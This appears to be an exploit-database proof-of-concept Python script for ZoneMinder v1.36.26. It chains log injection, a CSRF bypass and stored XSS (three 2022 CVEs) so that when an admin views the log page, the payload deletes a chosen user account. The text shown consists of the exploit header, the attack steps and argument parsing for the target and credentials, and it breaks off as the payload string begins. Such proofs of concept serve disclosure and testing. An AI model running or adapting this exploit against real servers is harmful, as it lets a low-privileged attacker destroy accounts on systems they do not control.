# Exploit Title: Zoneminder v1.36.26 - Log Injection -> CSRF Bypass -> Stored Cross-Site Scripting (XSS) # Date: 10/01/2022 # Exploit Author: Trenches of IT # Vendor Homepage: https://github.com/ZoneMinder/zoneminder # Version: v1.36.26 # Tested on: Linux/Windows # CVE: CVE-2022-39285, CVE-2022-39290, CVE-2022-39291 # Writeup: https://www.trenchesofit.com/2022/09/30/zoneminder-web-app-testing/ # # Proof of Concept: # 1 - The PoC injects a XSS payload with the CSRF bypass into logs. (This action will repeat every second until manually stopped) # 2 - Admin user logs navigates to http:///zm/index.php?view=log # 3 - XSS executes delete function on target UID (user). import requests import re import time import argparse import sys def getOptions(args=sys.argv[1:]): parser = argparse.ArgumentParser(description="Trenches of IT Zoneminder Exploit PoC", epilog="Example: poc.py -i 1.2.3.4 -p 80 -u lowpriv -p lowpriv -d 1") parser.add_argument("-i", "--ip", help="Provide the IP or hostname of the target zoneminder server. (Example: -i 1.2.3.4", required=True) parser.add_argument("-p", "--port", help="Provide the port of the target zoneminder server. (Example: -p 80", required=True) parser.add_argument("-zU", "--username", help="Provide the low privileged username for the target zoneminder server. (Example: -zU lowpriv", required=True) parser.add_argument("-zP", "--password", help="Provide the low privileged password for the target zoneminder server. (Example: -zP lowpriv", required=True) parser.add_argument("-d", "--deleteUser", help="Provide the target user UID to delete from the target zoneminder server. (Example: -d 7", required=True) options = parser.parse_args(args) return options options = getOptions(sys.argv[1:]) payload = "http%3A%2F%2F" + options.ip + "%2Fzm%2F